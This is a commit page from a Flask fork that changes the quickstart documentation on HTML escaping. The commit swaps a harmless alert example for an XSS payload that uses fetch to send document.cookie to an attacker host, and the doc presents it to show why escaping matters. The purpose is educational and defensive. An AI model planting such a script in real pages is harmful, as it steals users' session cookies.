orbit-oss/flask
4
4
Fork 2
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Added a real world html escaping example

Browse source
This commit is contained in:
Ahmet Gör 2026-03-17 16:05:48 +03:00
parent 4cae5d8e41
commit 192e107ca9
1 changed files with 4 additions and 2 deletions
Download patch file Download diff file Expand all files Collapse all files

6
docs/quickstart.rst
View file

@ -147,8 +147,10 @@ how you're using untrusted data.
name = request.args.get("name", "Flask")
return f"Hello, {escape(name)}!"
If a user submits ``/hello?name=<script>alert("bad")</script>``, escaping causes
it to be rendered as text, rather than running the script in the user's browser.
For example, if a web app displays user reviews without escaping input, an attacker could submit
``<script>fetch('https://attacker.com?cookie=' + document.cookie);</script>``.
Now, any user viewing that page would unknowingly send their cookies to the attacker.
This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering.
Routing